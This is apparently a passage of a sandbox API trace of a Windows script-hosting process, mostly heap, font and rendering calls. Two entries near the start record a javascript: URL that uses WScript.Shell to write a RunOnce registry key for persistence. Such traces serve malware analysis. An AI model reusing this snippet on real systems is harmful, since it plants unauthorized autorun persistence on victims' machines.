[0074.819] GetVersionExW (in: lpVersionInformation=0x33f1a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x750296a4, dwMinorVersion=0x760174, dwBuildNumber=0x794ec0, dwPlatformId=0x760000, szCSDVersion="梸|") | out: lpVersionInformation=0x33f1a8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0074.819] GetKeyboardLayoutList (in: nBuff=32, lpList=0x33f128 | out: lpList=0x33f128) returned 1 [0074.876] GetSystemMetrics (nIndex=4096) returned 0 [0074.876] RegisterClipboardFormatA (lpszFormat="HTML Format") returned 0xc0cd [0074.876] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b1 [0074.876] RegisterClipboardFormatA (lpszFormat="RTF As Text") returned 0xc0b4 [0074.876] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptor") returned 0xc0c8 [0074.876] RegisterClipboardFormatW (lpszFormat="FileGroupDescriptorW") returned 0xc0c9 [0074.876] RegisterClipboardFormatW (lpszFormat="FileContents") returned 0xc0c7 [0074.876] RegisterClipboardFormatW (lpszFormat="Shell IDList Array") returned 0xc07a [0074.876] RegisterClipboardFormatW (lpszFormat="UniformResourceLocator") returned 0xc0d1 [0074.876] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x2c) returned 0x7afba8 [0074.876] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4c) returned 0x7a38b8 [0074.876] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x64) returned 0x7c68c0 [0074.876] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x24) returned 0x7a92b8 [0074.876] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c68c0 | out: hHeap=0x760000) returned 1 [0074.876] SetTimer (hWnd=0x302a0, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0075.090] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.090] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x10) returned 0x7c64b8 [0075.090] HeapFree (in: 
hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.090] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78b940 | out: hHeap=0x760000) returned 1 [0075.090] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x7a3910 [0075.090] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a3910 | out: hHeap=0x760000) returned 1 [0075.090] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.090] IUnknown:AddRef (This=0x78c78c) returned 0x4 [0075.090] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", pdwZone=0x33f294, dwFlags=0x0 | out: pdwZone=0x33f294*=0xffffffff) returned 0x800c0011 [0075.091] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0075.091] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0075.091] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0075.091] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('osk.exe').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);", dwAction=0x2106, pPolicy=0x33f298, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x33f298*=0x0) returned 0x0 [0075.091] IUnknown:Release (This=0x78c78c) returned 0x3 [0075.091] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x7a3910 [0075.091] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a3910 | out: hHeap=0x760000) returned 1 [0075.091] HeapFree (in: 
hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.091] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x7a3910 [0075.091] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a3910 | out: hHeap=0x760000) returned 1 [0075.091] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.091] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x50) returned 0x7a3910 [0075.091] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a3910 | out: hHeap=0x760000) returned 1 [0075.091] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.091] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x100) returned 0x7cd638 [0075.092] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.092] RedrawWindow (hWnd=0x302a0, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0xa1) returned 1 [0075.369] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c64a0 | out: hHeap=0x760000) returned 1 [0075.369] RtlReAllocateHeap (Heap=0x760000, Flags=0x0, Ptr=0x79b868, Size=0x22) returned 0x79b868 [0075.369] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.369] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78ce40 | out: hHeap=0x760000) returned 1 [0075.369] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c64b8 | out: hHeap=0x760000) returned 1 [0075.370] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a8d00 | out: hHeap=0x760000) returned 1 [0075.370] GetCurrentThreadId () returned 0x544 [0075.370] IUnknown:Release (This=0x7a2f28) returned 0x0 [0075.370] IInternetProtocol:UnlockRequest (This=0x7abedc) returned 0x0 [0075.370] IUnknown:Release (This=0x7abec8) returned 0x0 [0075.370] GetProcessHeap () returned 0x760000 [0075.370] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7b2ce8 | out: hHeap=0x760000) returned 1 [0075.370] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c3d80 | 
out: hHeap=0x760000) returned 1 [0075.370] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a5548 | out: hHeap=0x760000) returned 1 [0075.370] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7abec8 | out: hHeap=0x760000) returned 1 [0075.371] RevokeBindStatusCallback (pBC=0x7a08d0, pBSCb=0x7a28c0) returned 0x0 [0075.371] IUnknown:Release (This=0x7a28c4) returned 0x4 [0075.371] IUnknown:Release (This=0x7a28c0) returned 0x3 [0075.371] IUnknown:Release (This=0x7a08d0) returned 0x0 [0075.371] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x79dbd8 | out: hHeap=0x760000) returned 1 [0075.371] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x790a18 | out: hHeap=0x760000) returned 1 [0075.371] IUnknown:Release (This=0x78ca14) returned 0xa [0075.371] IUnknown:Release (This=0x78ca14) returned 0x9 [0075.371] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.371] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.371] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7cc0c8 | out: hHeap=0x760000) returned 1 [0075.371] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7ac770 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] IUnknown:Release (This=0x78ca14) returned 0x8 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, 
dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] IUnknown:Release (This=0x78ca14) returned 0x7 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7ca0b0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a3338 | out: hHeap=0x760000) returned 1 [0075.372] IUnknown:Release (This=0x78ca14) returned 0x6 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.372] IUnknown:Release (This=0x78ca14) returned 0x5 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c3de0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a28b0 | out: hHeap=0x760000) returned 1 [0075.372] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a8d68 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7cd0d8 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7c3e00 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a8ea0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | 
out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x78bbb0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a27a0 | out: hHeap=0x760000) returned 1 [0075.373] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a32e0 | out: hHeap=0x760000) returned 1 [0075.373] GetCurrentThreadId () returned 0x544 [0075.373] GetCurrentThreadId () returned 0x544 [0075.373] GetCurrentThreadId () returned 0x544 [0075.373] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc) returned 0x78bbb0 [0075.374] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x64) returned 0x7c68c0 [0075.617] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xec) returned 0x7a3098 [0075.617] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.617] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.618] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xdc) returned 0x7bf6a0 [0075.619] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77dab0 [0075.619] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x250) returned 0x7a27a0 [0075.619] LsGetRubyLsimethods () returned 0x0 [0075.619] LsGetTatenakayokoLsimethods () returned 0x0 [0075.619] LsGetHihLsimethods () returned 0x0 [0075.619] LsGetWarichuLsimethods () returned 0x0 [0075.619] LsGetReverseLsimethods () returned 0x0 [0075.619] LsCreateContext () returned 0x0 [0075.619] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x670) returned 0x7cd740 [0075.619] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x24) returned 0x7a8f28 [0075.619] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x110) returned 0x7bc148 [0075.620] RtlAllocateHeap 
(HeapHandle=0x760000, Flags=0x0, Size=0x24) returned 0x7a92e8 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x2e4) returned 0x79b898 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x790a18 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x790a68 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xa0) returned 0x7a29f8 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x7b4798 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x790a90 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x7c4a98 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x7c4ea8 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x7c4ed0 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x400) returned 0x79bb88 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x7b2ce8 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x7b2d08 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x7b2d18 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x7b2d28 [0075.620] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x128) returned 0x7a2f28 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x11c) returned 0x7a8d00 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x108) returned 0x7cddb8 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x130) returned 0x79bf90 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x110) returned 0x7bc260 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x278) returned 0x79c0c8 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc8) returned 0x7a8e28 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, 
Size=0x190) returned 0x79c348 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x78) returned 0x772390 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xf0) returned 0x7cdec8 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x4c) returned 0x7a32e0 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x194) returned 0x79c4e0 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc8) returned 0x79c680 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x190) returned 0x79c750 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x108) returned 0x79c8e8 [0075.621] LsSetModWidthPairs () returned 0x0 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x240) returned 0x79c9f8 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x18) returned 0x7c3e00 [0075.621] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x20) returned 0x7c4ef8 [0075.622] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x10) returned 0x78bc40 [0075.622] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x2e0) returned 0x79cc40 [0075.622] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x24) returned 0x7a9318 [0075.622] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc0) returned 0x79cf28 [0075.622] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xc0) returned 0x79cff0 [0075.623] LsSetBreaking () returned 0x0 [0075.623] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x271) returned 0x79d0b8 [0075.623] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0xa) returned 0x78b940 [0075.623] LsSetDoc () returned 0x0 [0075.623] IBindStatusCallback:OnLowResource (This=0x7b2ce8, reserved=0x7cd8ec) returned 0x0 [0075.623] IBindStatusCallback:OnLowResource (This=0x7b2d08, reserved=0x7cd8ec) returned 0x0 [0075.623] IBindStatusCallback:OnLowResource (This=0x7b2d18, reserved=0x7cd8ec) returned 0x0 [0075.623] IBindStatusCallback:OnLowResource 
(This=0x7b2d28, reserved=0x7cd8ec) returned 0x0 [0075.623] LsCreateLine () returned 0x0 [0075.623] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.623] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb4) returned 0x79d338 [0075.623] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xf8) returned 0x79d3f8 [0075.623] EnumFontsW (hdc=0x3010a0d, lpLogfont="Times New Roman", lpProc=0x74c40b47, lParam=0x33e584) returned 1 [0075.624] CreateFontIndirectW (lplf=0x33e520) returned 0x50a08b0 [0075.624] SelectObject (hdc=0x3010a0d, h=0x50a08b0) returned 0x18a002e [0075.624] GetTextMetricsW (in: hdc=0x3010a0d, lptm=0x33e488 | out: lptm=0x33e488) returned 1 [0075.624] GetOutlineTextMetricsW (in: hdc=0x3010a0d, cjCopy=0xd8, potm=0x33e388 | out: potm=0x33e388) returned 0xd8 [0075.625] SelectObject (hdc=0x3010a0d, h=0x18a002e) returned 0x50a08b0 [0075.625] SelectObject (hdc=0x3010a0d, h=0x50a08b0) returned 0x18a002e [0075.625] GetTextFaceW (in: hdc=0x3010a0d, c=32, lpName=0x33e5d8 | out: lpName="Times New Roman") returned 16 [0075.625] SelectObject (hdc=0x3010a0d, h=0x18a002e) returned 0x50a08b0 [0075.625] SelectObject (hdc=0x3010a0d, h=0x50a08b0) returned 0x18a002e [0075.625] GetTextCharsetInfo (in: hdc=0x3010a0d, lpSig=0x33e540, dwFlags=0x0 | out: lpSig=0x33e540) returned 0 [0075.625] SelectObject (hdc=0x3010a0d, h=0x18a002e) returned 0x50a08b0 [0075.625] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xc) returned 0x7c64b8 [0075.625] SelectObject (hdc=0x3010a0d, h=0x50a08b0) returned 0x18a002e [0075.625] GetFontUnicodeRanges (in: hdc=0x3010a0d, lpgs=0x0 | out: lpgs=0x0) returned 0x27c [0075.625] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.625] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x27c) returned 0x7ca4b8 [0075.625] GetFontUnicodeRanges (in: hdc=0x3010a0d, lpgs=0x7ca4b8 | out: lpgs=0x7ca4b8) returned 0x27c [0075.625] SelectObject (hdc=0x3010a0d, 
h=0x18a002e) returned 0x50a08b0 [0075.625] SelectObject (hdc=0x3010a0d, h=0x50a08b0) returned 0x18a002e [0075.625] GetCharWidth32W (in: hdc=0x3010a0d, iFirst=0x20, iLast=0x7e, lpBuffer=0x33e518 | out: lpBuffer=0x33e518) returned 1 [0075.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x17c) returned 0x7ca740 [0075.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x800) returned 0x7ca8c8 [0075.628] SelectObject (hdc=0x3010a0d, h=0x18a002e) returned 0x50a08b0 [0075.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb4) returned 0x79d7b0 [0075.628] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xb4) returned 0x7cb0d0 [0075.628] LsQueryLineDup () returned 0x0 [0075.629] LsDestroyLine () returned 0x0 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x60) returned 0x7b3088 [0075.629] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x40) returned 0x7b47e0 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x79cc40 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) 
returned 1 [0075.629] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.629] IntersectRect (in: lprcDst=0x33f35c, lprcSrc1=0x33f35c, lprcSrc2=0x33f32c | out: lprcDst=0x33f35c) returned 1 [0075.629] IntersectRect (in: lprcDst=0x7ad580, lprcSrc1=0x7ad580, lprcSrc2=0x33f34c | out: lprcDst=0x7ad580) returned 1 [0075.629] IntersectRect (in: lprcDst=0x7ad580, lprcSrc1=0x7ad580, lprcSrc2=0x33f36c | out: lprcDst=0x7ad580) returned 1 [0075.629] IntersectRect (in: lprcDst=0x33f01c, lprcSrc1=0x33f01c, lprcSrc2=0x33efec | out: lprcDst=0x33f01c) returned 1 [0075.630] IntersectRect (in: lprcDst=0x7ad580, lprcSrc1=0x7ad580, lprcSrc2=0x33f00c | out: lprcDst=0x7ad580) returned 1 [0075.630] IntersectRect (in: lprcDst=0x7ad580, lprcSrc1=0x7ad580, lprcSrc2=0x33f02c | out: lprcDst=0x7ad580) returned 1 [0075.630] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.630] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33ef30, lprcSrc1=0x33ef30, lprcSrc2=0x7ad570 | out: lprcDst=0x33ef30) returned 1 [0075.630] UnionRect (in: lprcDst=0x33f238, lprcSrc1=0x33f238, lprcSrc2=0x33f1e4 | out: lprcDst=0x33f238) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f1d0, lprcSrc1=0x33f1d0, lprcSrc2=0x33f168 | out: lprcDst=0x33f1d0) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f0e0, lprcSrc1=0x33f0e0, lprcSrc2=0x33f168 | out: lprcDst=0x33f0e0) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f178, lprcSrc1=0x33f178, lprcSrc2=0x33f0e0 | out: lprcDst=0x33f178) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f1d0, lprcSrc1=0x33f1d0, lprcSrc2=0x33f168 | out: lprcDst=0x33f1d0) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f1d0, lprcSrc1=0x33f1d0, lprcSrc2=0x33f168 | out: lprcDst=0x33f1d0) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f0e0, lprcSrc1=0x33f0e0, lprcSrc2=0x33f168 | out: lprcDst=0x33f0e0) returned 1 
[0075.630] IntersectRect (in: lprcDst=0x33f178, lprcSrc1=0x33f178, lprcSrc2=0x33f0e0 | out: lprcDst=0x33f178) returned 1 [0075.630] IntersectRect (in: lprcDst=0x33f1d0, lprcSrc1=0x33f1d0, lprcSrc2=0x33f168 | out: lprcDst=0x33f1d0) returned 1 [0075.630] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x760000) returned 1 [0075.630] UnionRect (in: lprcDst=0x33f578, lprcSrc1=0x33f578, lprcSrc2=0x33f524 | out: lprcDst=0x33f578) returned 1 [0075.630] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9348 [0075.630] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x7a9348 | out: hHeap=0x760000) returned 1 [0075.630] RedrawWindow (hWnd=0x302a0, lprcUpdate=0x33f5f8, hrgnUpdate=0x0, flags=0x21) returned 1 [0075.630] GetFocus () returned 0x302a0 [0075.630] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x8) returned 0x7b2d38 [0075.630] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x4) returned 0x7b2d48 [0075.630] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9348 [0075.630] GetFocus () returned 0x302a0 [0075.631] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f2a0 | out: lpPoint=0x33f2a0) returned 1 [0075.631] GetCapture () returned 0x0 [0075.631] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a9378 [0075.631] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0075.631] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x0, Size=0x28) returned 0x7a93a8 [0075.631] GetCurrentThreadId () returned 0x544 [0075.631] HeapFree (in: hHeap=0x760000, dwFlags=0x0, lpMem=0x77da78 | out: hHeap=0x760000) returned 1 [0075.631] GetCurrentThreadId () returned 0x544 [0075.632] GetCurrentThreadId () returned 0x544 [0075.632] GetFocus () returned 0x302a0 [0075.632] ScreenToClient (in: hWnd=0x302a0, lpPoint=0x33f2a0 | out: lpPoint=0x33f2a0) returned 1 [0075.632] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x30) returned 0x77da78 [0075.632] GetCurrentThreadId 
